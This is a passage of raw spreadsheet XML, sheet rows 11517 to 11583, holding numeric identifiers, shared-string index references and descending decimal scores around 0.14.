        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="11517" ht="15.75" customHeight="1">
      <c r="A11517" s="1">
        <v>7263.0</v>
      </c>
      <c r="B11517" s="2">
        <v>5.0766196E7</v>
      </c>
      <c r="C11517" s="2" t="s">
        <v>11048</v>
      </c>
      <c r="D11517" s="2">
        <v>1.0</v>
      </c>
      <c r="E11517" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11517" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="11518" ht="15.75" customHeight="1">
      <c r="A11518" s="1">
        <v>21974.0</v>
      </c>
      <c r="B11518" s="2">
        <v>2.9170301E7</v>
      </c>
      <c r="C11518" s="2" t="s">
        <v>11049</v>
      </c>
      <c r="D11518" s="2">
        <v>1.0</v>
      </c>
      <c r="E11518" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11518" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="11519" ht="15.75" customHeight="1">
      <c r="A11519" s="1">
        <v>6008.0</v>
      </c>
      <c r="B11519" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C11519" s="2" t="s">
        <v>11050</v>
      </c>
      <c r="D11519" s="2">
        <v>1.0</v>
      </c>
      <c r="E11519" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11519" s="2">
        <v>0.1401326699834163</v>
      </c>
    </row>
    <row r="11520" ht="15.75" customHeight="1">
      <c r="A11520" s="1">
        <v>33803.0</v>
      </c>
      <c r="B11520" s="2">
        <v>8834497.0</v>
      </c>
      <c r="C11520" s="2" t="s">
        <v>11051</v>
      </c>
      <c r="D11520" s="2">
        <v>1.0</v>
      </c>
      <c r="E11520" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11520" s="2">
        <v>0.1399437412095641</v>
      </c>
    </row>
    <row r="11521" ht="15.75" customHeight="1">
      <c r="A11521" s="1">
        <v>8154.0</v>
      </c>
      <c r="B11521" s="2">
        <v>5.3187454E7</v>
      </c>
      <c r="C11521" s="2" t="s">
        <v>11052</v>
      </c>
      <c r="D11521" s="2">
        <v>1.0</v>
      </c>
      <c r="E11521" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11521" s="2">
        <v>0.1398809523809525</v>
      </c>
    </row>
    <row r="11522" ht="15.75" customHeight="1">
      <c r="A11522" s="1">
        <v>8391.0</v>
      </c>
      <c r="B11522" s="2">
        <v>5.3848941E7</v>
      </c>
      <c r="C11522" s="2" t="s">
        <v>11053</v>
      </c>
      <c r="D11522" s="2">
        <v>1.0</v>
      </c>
      <c r="E11522" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11522" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="11523" ht="15.75" customHeight="1">
      <c r="A11523" s="1">
        <v>3262.0</v>
      </c>
      <c r="B11523" s="2">
        <v>3.7441681E7</v>
      </c>
      <c r="C11523" s="2" t="s">
        <v>11054</v>
      </c>
      <c r="D11523" s="2">
        <v>1.0</v>
      </c>
      <c r="E11523" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11523" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="11524" ht="15.75" customHeight="1">
      <c r="A11524" s="1">
        <v>12876.0</v>
      </c>
      <c r="B11524" s="2">
        <v>3.1939068E7</v>
      </c>
      <c r="C11524" s="2" t="s">
        <v>11055</v>
      </c>
      <c r="D11524" s="2">
        <v>1.0</v>
      </c>
      <c r="E11524" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11524" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="11525" ht="15.75" customHeight="1">
      <c r="A11525" s="1">
        <v>17499.0</v>
      </c>
      <c r="B11525" s="2">
        <v>4.9998004E7</v>
      </c>
      <c r="C11525" s="2" t="s">
        <v>11056</v>
      </c>
      <c r="D11525" s="2">
        <v>1.0</v>
      </c>
      <c r="E11525" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11525" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="11526" ht="15.75" customHeight="1">
      <c r="A11526" s="1">
        <v>18171.0</v>
      </c>
      <c r="B11526" s="2">
        <v>5.1935867E7</v>
      </c>
      <c r="C11526" s="2" t="s">
        <v>11057</v>
      </c>
      <c r="D11526" s="2">
        <v>1.0</v>
      </c>
      <c r="E11526" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11526" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="11527" ht="15.75" customHeight="1">
      <c r="A11527" s="1">
        <v>4822.0</v>
      </c>
      <c r="B11527" s="2">
        <v>4.3622548E7</v>
      </c>
      <c r="C11527" s="2" t="s">
        <v>11058</v>
      </c>
      <c r="D11527" s="2">
        <v>1.0</v>
      </c>
      <c r="E11527" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11527" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="11528" ht="15.75" customHeight="1">
      <c r="A11528" s="1">
        <v>15993.0</v>
      </c>
      <c r="B11528" s="2">
        <v>4.4951279E7</v>
      </c>
      <c r="C11528" s="2" t="s">
        <v>11059</v>
      </c>
      <c r="D11528" s="2">
        <v>1.0</v>
      </c>
      <c r="E11528" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11528" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="11529" ht="15.75" customHeight="1">
      <c r="A11529" s="1">
        <v>3213.0</v>
      </c>
      <c r="B11529" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C11529" s="2" t="s">
        <v>11060</v>
      </c>
      <c r="D11529" s="2">
        <v>1.0</v>
      </c>
      <c r="E11529" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11529" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11530" ht="15.75" customHeight="1">
      <c r="A11530" s="1">
        <v>6803.0</v>
      </c>
      <c r="B11530" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C11530" s="2" t="s">
        <v>11061</v>
      </c>
      <c r="D11530" s="2">
        <v>1.0</v>
      </c>
      <c r="E11530" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11530" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11531" ht="15.75" customHeight="1">
      <c r="A11531" s="1">
        <v>8246.0</v>
      </c>
      <c r="B11531" s="2">
        <v>5.3372656E7</v>
      </c>
      <c r="C11531" s="2" t="s">
        <v>11062</v>
      </c>
      <c r="D11531" s="2">
        <v>1.0</v>
      </c>
      <c r="E11531" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11531" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11532" ht="15.75" customHeight="1">
      <c r="A11532" s="1">
        <v>13628.0</v>
      </c>
      <c r="B11532" s="2">
        <v>3.5886011E7</v>
      </c>
      <c r="C11532" s="2" t="s">
        <v>11063</v>
      </c>
      <c r="D11532" s="2">
        <v>1.0</v>
      </c>
      <c r="E11532" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11532" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11533" ht="15.75" customHeight="1">
      <c r="A11533" s="1">
        <v>14284.0</v>
      </c>
      <c r="B11533" s="2">
        <v>3.8477939E7</v>
      </c>
      <c r="C11533" s="2" t="s">
        <v>11064</v>
      </c>
      <c r="D11533" s="2">
        <v>1.0</v>
      </c>
      <c r="E11533" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11533" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11534" ht="15.75" customHeight="1">
      <c r="A11534" s="1">
        <v>15568.0</v>
      </c>
      <c r="B11534" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C11534" s="2" t="s">
        <v>11065</v>
      </c>
      <c r="D11534" s="2">
        <v>1.0</v>
      </c>
      <c r="E11534" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11534" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11535" ht="15.75" customHeight="1">
      <c r="A11535" s="1">
        <v>17260.0</v>
      </c>
      <c r="B11535" s="2">
        <v>4.9146836E7</v>
      </c>
      <c r="C11535" s="2" t="s">
        <v>11066</v>
      </c>
      <c r="D11535" s="2">
        <v>1.0</v>
      </c>
      <c r="E11535" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11535" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11536" ht="15.75" customHeight="1">
      <c r="A11536" s="1">
        <v>21786.0</v>
      </c>
      <c r="B11536" s="2">
        <v>2.659359E7</v>
      </c>
      <c r="C11536" s="2" t="s">
        <v>11067</v>
      </c>
      <c r="D11536" s="2">
        <v>1.0</v>
      </c>
      <c r="E11536" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11536" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11537" ht="15.75" customHeight="1">
      <c r="A11537" s="1">
        <v>23681.0</v>
      </c>
      <c r="B11537" s="2">
        <v>6974785.0</v>
      </c>
      <c r="C11537" s="2" t="s">
        <v>11068</v>
      </c>
      <c r="D11537" s="2">
        <v>1.0</v>
      </c>
      <c r="E11537" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11537" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11538" ht="15.75" customHeight="1">
      <c r="A11538" s="1">
        <v>32464.0</v>
      </c>
      <c r="B11538" s="2">
        <v>5.678448E7</v>
      </c>
      <c r="C11538" s="2" t="s">
        <v>11069</v>
      </c>
      <c r="D11538" s="2">
        <v>1.0</v>
      </c>
      <c r="E11538" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11538" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="11539" ht="15.75" customHeight="1">
      <c r="A11539" s="1">
        <v>17086.0</v>
      </c>
      <c r="B11539" s="2">
        <v>4.863875E7</v>
      </c>
      <c r="C11539" s="2" t="s">
        <v>11070</v>
      </c>
      <c r="D11539" s="2">
        <v>1.0</v>
      </c>
      <c r="E11539" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11539" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="11540" ht="15.75" customHeight="1">
      <c r="A11540" s="1">
        <v>4873.0</v>
      </c>
      <c r="B11540" s="2">
        <v>4.3849151E7</v>
      </c>
      <c r="C11540" s="2" t="s">
        <v>11071</v>
      </c>
      <c r="D11540" s="2">
        <v>1.0</v>
      </c>
      <c r="E11540" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11540" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="11541" ht="15.75" customHeight="1">
      <c r="A11541" s="1">
        <v>8206.0</v>
      </c>
      <c r="B11541" s="2">
        <v>5.330171E7</v>
      </c>
      <c r="C11541" s="2" t="s">
        <v>11072</v>
      </c>
      <c r="D11541" s="2">
        <v>1.0</v>
      </c>
      <c r="E11541" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11541" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="11542" ht="15.75" customHeight="1">
      <c r="A11542" s="1">
        <v>10045.0</v>
      </c>
      <c r="B11542" s="2">
        <v>5.7101175E7</v>
      </c>
      <c r="C11542" s="2" t="s">
        <v>11073</v>
      </c>
      <c r="D11542" s="2">
        <v>1.0</v>
      </c>
      <c r="E11542" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11542" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="11543" ht="15.75" customHeight="1">
      <c r="A11543" s="1">
        <v>1014.0</v>
      </c>
      <c r="B11543" s="2">
        <v>2.3107495E7</v>
      </c>
      <c r="C11543" s="2" t="s">
        <v>11074</v>
      </c>
      <c r="D11543" s="2">
        <v>1.0</v>
      </c>
      <c r="E11543" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11543" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="11544" ht="15.75" customHeight="1">
      <c r="A11544" s="1">
        <v>16639.0</v>
      </c>
      <c r="B11544" s="2">
        <v>4.7132985E7</v>
      </c>
      <c r="C11544" s="2" t="s">
        <v>11075</v>
      </c>
      <c r="D11544" s="2">
        <v>1.0</v>
      </c>
      <c r="E11544" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11544" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="11545" ht="15.75" customHeight="1">
      <c r="A11545" s="1">
        <v>17418.0</v>
      </c>
      <c r="B11545" s="2">
        <v>4.9693342E7</v>
      </c>
      <c r="C11545" s="2" t="s">
        <v>11076</v>
      </c>
      <c r="D11545" s="2">
        <v>1.0</v>
      </c>
      <c r="E11545" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11545" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="11546" ht="15.75" customHeight="1">
      <c r="A11546" s="1">
        <v>18458.0</v>
      </c>
      <c r="B11546" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C11546" s="2" t="s">
        <v>11077</v>
      </c>
      <c r="D11546" s="2">
        <v>1.0</v>
      </c>
      <c r="E11546" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11546" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="11547" ht="15.75" customHeight="1">
      <c r="A11547" s="1">
        <v>29597.0</v>
      </c>
      <c r="B11547" s="2">
        <v>3.3554951E7</v>
      </c>
      <c r="C11547" s="2" t="s">
        <v>11078</v>
      </c>
      <c r="D11547" s="2">
        <v>1.0</v>
      </c>
      <c r="E11547" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11547" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="11548" ht="15.75" customHeight="1">
      <c r="A11548" s="1">
        <v>347.0</v>
      </c>
      <c r="B11548" s="2">
        <v>1.5979212E7</v>
      </c>
      <c r="C11548" s="2" t="s">
        <v>11079</v>
      </c>
      <c r="D11548" s="2">
        <v>1.0</v>
      </c>
      <c r="E11548" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11548" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11549" ht="15.75" customHeight="1">
      <c r="A11549" s="1">
        <v>3558.0</v>
      </c>
      <c r="B11549" s="2">
        <v>3.8840808E7</v>
      </c>
      <c r="C11549" s="2" t="s">
        <v>11080</v>
      </c>
      <c r="D11549" s="2">
        <v>1.0</v>
      </c>
      <c r="E11549" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11549" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11550" ht="15.75" customHeight="1">
      <c r="A11550" s="1">
        <v>4144.0</v>
      </c>
      <c r="B11550" s="2">
        <v>4.1416231E7</v>
      </c>
      <c r="C11550" s="2" t="s">
        <v>11081</v>
      </c>
      <c r="D11550" s="2">
        <v>1.0</v>
      </c>
      <c r="E11550" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11550" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11551" ht="15.75" customHeight="1">
      <c r="A11551" s="1">
        <v>5474.0</v>
      </c>
      <c r="B11551" s="2">
        <v>4.5716714E7</v>
      </c>
      <c r="C11551" s="2" t="s">
        <v>11082</v>
      </c>
      <c r="D11551" s="2">
        <v>1.0</v>
      </c>
      <c r="E11551" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11551" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11552" ht="15.75" customHeight="1">
      <c r="A11552" s="1">
        <v>6614.0</v>
      </c>
      <c r="B11552" s="2">
        <v>4.9026912E7</v>
      </c>
      <c r="C11552" s="2" t="s">
        <v>11083</v>
      </c>
      <c r="D11552" s="2">
        <v>1.0</v>
      </c>
      <c r="E11552" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11552" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11553" ht="15.75" customHeight="1">
      <c r="A11553" s="1">
        <v>7006.0</v>
      </c>
      <c r="B11553" s="2">
        <v>5.0089912E7</v>
      </c>
      <c r="C11553" s="2" t="s">
        <v>11084</v>
      </c>
      <c r="D11553" s="2">
        <v>1.0</v>
      </c>
      <c r="E11553" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11553" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11554" ht="15.75" customHeight="1">
      <c r="A11554" s="1">
        <v>7605.0</v>
      </c>
      <c r="B11554" s="2">
        <v>5.1652734E7</v>
      </c>
      <c r="C11554" s="2" t="s">
        <v>11085</v>
      </c>
      <c r="D11554" s="2">
        <v>1.0</v>
      </c>
      <c r="E11554" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11554" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11555" ht="15.75" customHeight="1">
      <c r="A11555" s="1">
        <v>8294.0</v>
      </c>
      <c r="B11555" s="2">
        <v>5.3528885E7</v>
      </c>
      <c r="C11555" s="2" t="s">
        <v>11086</v>
      </c>
      <c r="D11555" s="2">
        <v>1.0</v>
      </c>
      <c r="E11555" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11555" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11556" ht="15.75" customHeight="1">
      <c r="A11556" s="1">
        <v>8508.0</v>
      </c>
      <c r="B11556" s="2">
        <v>5.4055491E7</v>
      </c>
      <c r="C11556" s="2" t="s">
        <v>11087</v>
      </c>
      <c r="D11556" s="2">
        <v>1.0</v>
      </c>
      <c r="E11556" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11556" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11557" ht="15.75" customHeight="1">
      <c r="A11557" s="1">
        <v>13905.0</v>
      </c>
      <c r="B11557" s="2">
        <v>3.7076332E7</v>
      </c>
      <c r="C11557" s="2" t="s">
        <v>11088</v>
      </c>
      <c r="D11557" s="2">
        <v>1.0</v>
      </c>
      <c r="E11557" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11557" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11558" ht="15.75" customHeight="1">
      <c r="A11558" s="1">
        <v>15939.0</v>
      </c>
      <c r="B11558" s="2">
        <v>4.4734782E7</v>
      </c>
      <c r="C11558" s="2" t="s">
        <v>11089</v>
      </c>
      <c r="D11558" s="2">
        <v>1.0</v>
      </c>
      <c r="E11558" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11558" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11559" ht="15.75" customHeight="1">
      <c r="A11559" s="1">
        <v>17387.0</v>
      </c>
      <c r="B11559" s="2">
        <v>4.9574188E7</v>
      </c>
      <c r="C11559" s="2" t="s">
        <v>11090</v>
      </c>
      <c r="D11559" s="2">
        <v>1.0</v>
      </c>
      <c r="E11559" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11559" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11560" ht="15.75" customHeight="1">
      <c r="A11560" s="1">
        <v>27814.0</v>
      </c>
      <c r="B11560" s="2">
        <v>2.3318409E7</v>
      </c>
      <c r="C11560" s="2" t="s">
        <v>11091</v>
      </c>
      <c r="D11560" s="2">
        <v>1.0</v>
      </c>
      <c r="E11560" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11560" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11561" ht="15.75" customHeight="1">
      <c r="A11561" s="1">
        <v>29281.0</v>
      </c>
      <c r="B11561" s="2">
        <v>3.1011405E7</v>
      </c>
      <c r="C11561" s="2" t="s">
        <v>11092</v>
      </c>
      <c r="D11561" s="2">
        <v>1.0</v>
      </c>
      <c r="E11561" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11561" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11562" ht="15.75" customHeight="1">
      <c r="A11562" s="1">
        <v>29945.0</v>
      </c>
      <c r="B11562" s="2">
        <v>3607504.0</v>
      </c>
      <c r="C11562" s="2" t="s">
        <v>11093</v>
      </c>
      <c r="D11562" s="2">
        <v>1.0</v>
      </c>
      <c r="E11562" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11562" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="11563" ht="15.75" customHeight="1">
      <c r="A11563" s="1">
        <v>9192.0</v>
      </c>
      <c r="B11563" s="2">
        <v>5.5394838E7</v>
      </c>
      <c r="C11563" s="2" t="s">
        <v>11094</v>
      </c>
      <c r="D11563" s="2">
        <v>1.0</v>
      </c>
      <c r="E11563" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11563" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="11564" ht="15.75" customHeight="1">
      <c r="A11564" s="1">
        <v>20565.0</v>
      </c>
      <c r="B11564" s="2">
        <v>1.3431696E7</v>
      </c>
      <c r="C11564" s="2" t="s">
        <v>11095</v>
      </c>
      <c r="D11564" s="2">
        <v>1.0</v>
      </c>
      <c r="E11564" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11564" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="11565" ht="15.75" customHeight="1">
      <c r="A11565" s="1">
        <v>5143.0</v>
      </c>
      <c r="B11565" s="2">
        <v>4.4649057E7</v>
      </c>
      <c r="C11565" s="2" t="s">
        <v>11096</v>
      </c>
      <c r="D11565" s="2">
        <v>1.0</v>
      </c>
      <c r="E11565" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11565" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="11566" ht="15.75" customHeight="1">
      <c r="A11566" s="1">
        <v>6795.0</v>
      </c>
      <c r="B11566" s="2">
        <v>4.951033E7</v>
      </c>
      <c r="C11566" s="2" t="s">
        <v>11097</v>
      </c>
      <c r="D11566" s="2">
        <v>1.0</v>
      </c>
      <c r="E11566" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11566" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="11567" ht="15.75" customHeight="1">
      <c r="A11567" s="1">
        <v>14628.0</v>
      </c>
      <c r="B11567" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C11567" s="2" t="s">
        <v>11098</v>
      </c>
      <c r="D11567" s="2">
        <v>1.0</v>
      </c>
      <c r="E11567" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11567" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="11568" ht="15.75" customHeight="1">
      <c r="A11568" s="1">
        <v>19190.0</v>
      </c>
      <c r="B11568" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C11568" s="2" t="s">
        <v>11099</v>
      </c>
      <c r="D11568" s="2">
        <v>1.0</v>
      </c>
      <c r="E11568" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11568" s="2">
        <v>0.1376811594202899</v>
      </c>
    </row>
    <row r="11569" ht="15.75" customHeight="1">
      <c r="A11569" s="1">
        <v>7008.0</v>
      </c>
      <c r="B11569" s="2">
        <v>5.0089912E7</v>
      </c>
      <c r="C11569" s="2" t="s">
        <v>11100</v>
      </c>
      <c r="D11569" s="2">
        <v>1.0</v>
      </c>
      <c r="E11569" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11569" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="11570" ht="15.75" customHeight="1">
      <c r="A11570" s="1">
        <v>15677.0</v>
      </c>
      <c r="B11570" s="2">
        <v>4.3824839E7</v>
      </c>
      <c r="C11570" s="2" t="s">
        <v>11101</v>
      </c>
      <c r="D11570" s="2">
        <v>1.0</v>
      </c>
      <c r="E11570" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11570" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="11571" ht="15.75" customHeight="1">
      <c r="A11571" s="1">
        <v>24505.0</v>
      </c>
      <c r="B11571" s="2">
        <v>1.1107069E7</v>
      </c>
      <c r="C11571" s="2" t="s">
        <v>11102</v>
      </c>
      <c r="D11571" s="2">
        <v>1.0</v>
      </c>
      <c r="E11571" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11571" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="11572" ht="15.75" customHeight="1">
      <c r="A11572" s="1">
        <v>30326.0</v>
      </c>
      <c r="B11572" s="2">
        <v>3.8086132E7</v>
      </c>
      <c r="C11572" s="2" t="s">
        <v>11103</v>
      </c>
      <c r="D11572" s="2">
        <v>1.0</v>
      </c>
      <c r="E11572" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11572" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="11573" ht="15.75" customHeight="1">
      <c r="A11573" s="1">
        <v>17629.0</v>
      </c>
      <c r="B11573" s="2">
        <v>5.0381034E7</v>
      </c>
      <c r="C11573" s="2" t="s">
        <v>11104</v>
      </c>
      <c r="D11573" s="2">
        <v>1.0</v>
      </c>
      <c r="E11573" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11573" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="11574" ht="15.75" customHeight="1">
      <c r="A11574" s="1">
        <v>29426.0</v>
      </c>
      <c r="B11574" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C11574" s="2" t="s">
        <v>11105</v>
      </c>
      <c r="D11574" s="2">
        <v>1.0</v>
      </c>
      <c r="E11574" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11574" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="11575" ht="15.75" customHeight="1">
      <c r="A11575" s="1">
        <v>7595.0</v>
      </c>
      <c r="B11575" s="2">
        <v>5.1615543E7</v>
      </c>
      <c r="C11575" s="2" t="s">
        <v>11106</v>
      </c>
      <c r="D11575" s="2">
        <v>1.0</v>
      </c>
      <c r="E11575" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11575" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="11576" ht="15.75" customHeight="1">
      <c r="A11576" s="1">
        <v>6578.0</v>
      </c>
      <c r="B11576" s="2">
        <v>4.8917382E7</v>
      </c>
      <c r="C11576" s="2" t="s">
        <v>11107</v>
      </c>
      <c r="D11576" s="2">
        <v>1.0</v>
      </c>
      <c r="E11576" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11576" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="11577" ht="15.75" customHeight="1">
      <c r="A11577" s="1">
        <v>6753.0</v>
      </c>
      <c r="B11577" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C11577" s="2" t="s">
        <v>11108</v>
      </c>
      <c r="D11577" s="2">
        <v>1.0</v>
      </c>
      <c r="E11577" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11577" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="11578" ht="15.75" customHeight="1">
      <c r="A11578" s="1">
        <v>16843.0</v>
      </c>
      <c r="B11578" s="2">
        <v>4.7908739E7</v>
      </c>
      <c r="C11578" s="2" t="s">
        <v>11109</v>
      </c>
      <c r="D11578" s="2">
        <v>1.0</v>
      </c>
      <c r="E11578" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11578" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="11579" ht="15.75" customHeight="1">
      <c r="A11579" s="1">
        <v>14949.0</v>
      </c>
      <c r="B11579" s="2">
        <v>4.1294756E7</v>
      </c>
      <c r="C11579" s="2" t="s">
        <v>11110</v>
      </c>
      <c r="D11579" s="2">
        <v>1.0</v>
      </c>
      <c r="E11579" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11579" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="11580" ht="15.75" customHeight="1">
      <c r="A11580" s="1">
        <v>8118.0</v>
      </c>
      <c r="B11580" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C11580" s="2" t="s">
        <v>11111</v>
      </c>
      <c r="D11580" s="2">
        <v>1.0</v>
      </c>
      <c r="E11580" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11580" s="2">
        <v>0.1368312757201646</v>
      </c>
    </row>
    <row r="11581" ht="15.75" customHeight="1">
      <c r="A11581" s="1">
        <v>20872.0</v>
      </c>
      <c r="B11581" s="2">
        <v>1.5960595E7</v>
      </c>
      <c r="C11581" s="2" t="s">
        <v>11112</v>
      </c>
      <c r="D11581" s="2">
        <v>1.0</v>
      </c>
      <c r="E11581" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11581" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="11582" ht="15.75" customHeight="1">
      <c r="A11582" s="1">
        <v>1022.0</v>
      </c>
      <c r="B11582" s="2">
        <v>2.31655E7</v>
      </c>
      <c r="C11582" s="2" t="s">
        <v>11113</v>
      </c>
      <c r="D11582" s="2">
        <v>1.0</v>
      </c>
      <c r="E11582" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11582" s="2">
        <v>0.1365740740740741</v>
      </c>
    </row>
    <row r="11583" ht="15.75" customHeight="1">
      <c r="A11583" s="1">
        <v>10109.0</v>
      </c>
      <c r="B11583" s="2">
        <v>5.7243449E7</v>
      </c>
      <c r="C11583" s="2" t="s">
        <v>11114</v>
      </c>
      <c r="D11583" s="2">
        <v>1.0</v>
      </c>
      <c r="E11583" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11583" s="2">
